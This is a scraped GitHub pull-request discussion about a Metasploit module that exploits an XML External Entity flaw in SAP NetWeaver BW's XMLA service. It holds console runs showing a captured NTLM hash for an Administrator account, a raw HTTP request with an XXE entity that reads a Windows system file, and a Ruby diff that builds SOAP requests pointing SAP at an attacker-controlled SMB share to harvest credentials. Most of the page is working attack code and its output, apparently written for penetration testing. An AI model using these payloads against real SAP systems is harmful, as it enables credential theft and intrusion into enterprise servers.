Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP

Loading…

SAP /sap/bw/xml/soap/xmla XMLA service (XML DOCTYPE) SMB relay #1656

Merged
merged 2 commits into from

2 participants

@nmonkee

This module exploits the SAP NetWeaver BW XML External Entity vulnerability. An XML External Entities (XXE) issue exists within the XMLA service (XML DOCTYPE) function. The XXE vulnerability in SAP BW can lead to arbitrary file reading or an SMBRelay attack.

SAP Note 1597066 / DSECRG-12-033.

ref: http://erpscan.com/advisories/dsecrg-12-033-sap-basis-6-407-02-xml-external-entity

@jvazquez-r7
Collaborator

Trying to run it against windows installation results in the next error:

msf auxiliary(sap_soap_xmla_bw_smb_relay) > show options

Module options (auxiliary/scanner/sap/sap_soap_xmla_bw_smb_relay):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CLIENT   001              yes       SAP client
   PASS     06071992         yes       Password
   PATH     c:\foo.txt       yes       File path (e.g. \xx.xx.xx.xx\share)
   Proxies                   no        Use a proxy chain
   RHOSTS   192.168.172.186  yes       The target address range or CIDR identifier
   RPORT    8000             yes       The target port
   THREADS  1                yes       The number of concurrent threads
   USER     SAP*             yes       Username
   VHOST                     no        HTTP server virtual host

msf auxiliary(sap_soap_xmla_bw_smb_relay) > run

[*] [SAP] 192.168.172.186:8000 - sending request for c:\foo.txt
[-] [SAP] 192.168.172.186:8000 - Error code: 200
[-] [SAP] 192.168.172.186:8000 - Error title: OK
[-] [SAP] 192.168.172.186:8000 - Error message: <?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
                         SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
  <SOAP-ENV:Fault>
   <faultcode>XMLAnalysisError.0x80000005</faultcode>
   <faultstring>The XML for Analysis provider encountered an error</faultstring>
   <faultactor>XML for Analysis Provider</faultactor>
   <detail>
<Error ErrorCode="2147483653" Description="
Inconsistent input parameter (parameter: METHOD, value &lt;unknown&gt;)" Source="XML for Analysis Provider" HelpFile="" />
   </detail>
  </SOAP-ENV:Fault>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>


[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@jvazquez-r7
Collaborator

And test results on Linux, neither access to file contents:

msf auxiliary(sap_soap_xmla_bw_smb_relay) > show options

Module options (auxiliary/scanner/sap/sap_soap_xmla_bw_smb_relay):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CLIENT   001              yes       SAP client
   PASS     06071992         yes       Password
   PATH     /etc/passwod     yes       File path (e.g. \xx.xx.xx.xx\share)
   Proxies                   no        Use a proxy chain
   RHOSTS   192.168.172.179  yes       The target address range or CIDR identifier
   RPORT    8042             yes       The target port
   THREADS  1                yes       The number of concurrent threads
   USER     SAP*             yes       Username
   VHOST                     no        HTTP server virtual host

msf auxiliary(sap_soap_xmla_bw_smb_relay) > run

[*] [SAP] 192.168.172.179:8042 - sending request for /etc/passwod
[-] [SAP] 192.168.172.179:8042 - Error code: 200
[-] [SAP] 192.168.172.179:8042 - Error title: OK
[-] [SAP] 192.168.172.179:8042 - Error message: <?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
                         SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
  <SOAP-ENV:Fault>
   <faultcode>XMLAnalysisError.0x80000005</faultcode>
   <faultstring>The XML for Analysis provider encountered an error</faultstring>
   <faultactor>XML for Analysis Provider</faultactor>
   <detail>
<Error ErrorCode="2147483653" Description="
Request transfered is not a valid XML/SOAP document" Source="XML for Analysis Provider" HelpFile="" />
   </detail>
  </SOAP-ENV:Fault>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>


[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@jvazquez-r7
Collaborator

Any clues? Am I doing something wrong to test this module?

@nmonkee

works fine:


msf  auxiliary(sap_soap_xmla_bw_smb_relay) > run
[*] [SAP] 192.168.1.86:8000 - sending request for \\192.168.1.71\share
[*] SMB Captured - 2013-05-09 22:31:02 +0100
NTLMv1 Response Captured from 192.168.1.86:51291 - 192.168.1.86 
USER:Administrator DOMAIN:GATEWAY OS: LM:
LMHASH:Disabled 
NTHASH:d9d3c192407bc93152376e16d6a3a3fa9aa53b3cf940f8d4
[*] [SAP] 192.168.1.86:8000 - Error code: 200
[*] [SAP] 192.168.1.86:8000 - Error title: OK
[*] [SAP] 192.168.1.86:8000 - Error message: <?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
                         SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
  <SOAP-ENV:Fault>
   <faultcode>XMLAnalysisError.0x80000005</faultcode>
   <faultstring>The XML for Analysis provider encountered an error</faultstring>
   <faultactor>XML for Analysis Provider</faultactor>
   <detail>
<Error ErrorCode="2147483653" Description="
Request transfered is not a valid XML/SOAP document" Source="XML for Analysis Provider" HelpFile="" />
   </detail>
  </SOAP-ENV:Fault>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
@jvazquez-r7
Collaborator

It's just the smb relay part, isn't working the XXE expansion vuln? I dont see this module complete if we can't read arbitrary remote files.

@nmonkee

"An attacker can attempt to generate a "denial of service" situation or start an "SMB relay attack" using Document Type Definitions (DTD) via the SOAP/XMLA interface."

ref: https://service.sap.com/sap/support/notes/1597066

Any file read attempt results in error: "Request transfered is not a valid XML/SOAP document". I think this is a red herring as far as arbitrary file read goes. Unless there is some trick I'm not aware of or haven't tried.


POST /sap/bw/xml/soap/xmla?sap-client=001&sap-language=EN HTTP/1.0
Host: 10.0.7.19:8000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: sap-usercontext=sap-language=EN&sap-client=001
Authorization: Basic U0FQKjowNjA3MTk5Mg==
Content-Type: text/xml; charset=UTF-8
Content-Length: 126

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE request
[ 
<!ENTITY include SYSTEM "file:///c:/windows/win.ini">
>]

@jvazquez-r7 jvazquez-r7 referenced this pull request in nmonkee/metasploit-framework
Merged

SAP SMB Relay Abuses #11

@jvazquez-r7 jvazquez-r7 merged commit 1128663 into from
@jvazquez-r7
Collaborator

@nmonkee shared pcap's for verification from the smb relay attacks. Looks good. Merged after little final cleanup:

d9bdf3d

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
This page is out of date. Refresh to see the latest.
Showing with 9 additions and 9 deletions.
  1. +9 −9 modules/auxiliary/scanner/sap/sap_smb_relay.rb
View
18 modules/auxiliary/scanner/sap/sap_smb_relay.rb
@@ -195,19 +195,19 @@ def run_clba_classif_file_remote
smb_uri = "\\\\#{datastore['LHOST']}\\#{Rex::Text.rand_text_alpha_lower(7)}.#{Rex::Text.rand_text_alpha_lower(3)}"
data = '<?xml version="1.0" encoding="utf-8" ?>'
- data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" '
- data << 'xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" '
+ data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" '
+ data << 'xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" '
data << 'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">'
data << '<SOAP-ENV:Header/>'
data << '<SOAP-ENV:Body>'
- data << '<n1:CLBA_CLASSIF_FILE_REMOTE_HOST xmlns:n1="urn:sap-com:document:sap:rfc:functions" env:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
+ data << '<CLBA_CLASSIF_FILE_REMOTE_HOST xmlns="urn:sap-com:document:sap:rfc:functions">'
data << '<CLASSIF_FILE>'
data << '<item>'
data << '<ZEILE>a</ZEILE>'
data << '</item>'
data << '</CLASSIF_FILE>'
data << '<FILE_NAME>' + smb_uri + '</FILE_NAME>'
- data << '</n1:CLBA_CLASSIF_FILE_REMOTE_HOST>'
+ data << '</CLBA_CLASSIF_FILE_REMOTE_HOST>'
data << '</SOAP-ENV:Body>'
data << '</SOAP-ENV:Envelope>'
send_soap_rfc_request(data, smb_uri)
@@ -217,23 +217,23 @@ def run_clba_update_file_remote
smb_uri = "\\\\#{datastore['LHOST']}\\#{Rex::Text.rand_text_alpha_lower(7)}.#{Rex::Text.rand_text_alpha_lower(3)}"
data = '<?xml version="1.0" encoding="utf-8" ?>'
- data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" '
- data << 'xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" '
+ data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" '
+ data << 'xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" '
data << 'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">'
data << '<SOAP-ENV:Header/>'
data << '<SOAP-ENV:Body>'
- data << '<n1:CLBA_UPDATE_FILE_REMOTE_HOST xmlns:n1="urn:sap-com:document:sap:rfc:functions" env:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
+ data << '<CLBA_UPDATE_FILE_REMOTE_HOST xmlns="urn:sap-com:document:sap:rfc:functions">'
data << '<DATA_TAB>'
data << '<item>'
data << '<TABNAME>a</TABNAME>'
- data << '<NUMBER>0</NUMBER>'
+ data << '<NUMMER>0</NUMMER>'
data << '<TEXT>a</TEXT>'
data << '<COLOR>a</COLOR>'
data << '<DATA>a</DATA>'
data << '</item>'
data << '</DATA_TAB>'
data << '<FILE_NAME>' + smb_uri + '</FILE_NAME>'
- data << '</n1:CLBA_UPDATE_FILE_REMOTE_HOST>'
+ data << '</CLBA_UPDATE_FILE_REMOTE_HOST>'
data << '</SOAP-ENV:Body>'
data << '</SOAP-ENV:Envelope>'
send_soap_rfc_request(data, smb_uri)
Something went wrong with that request. Please try again.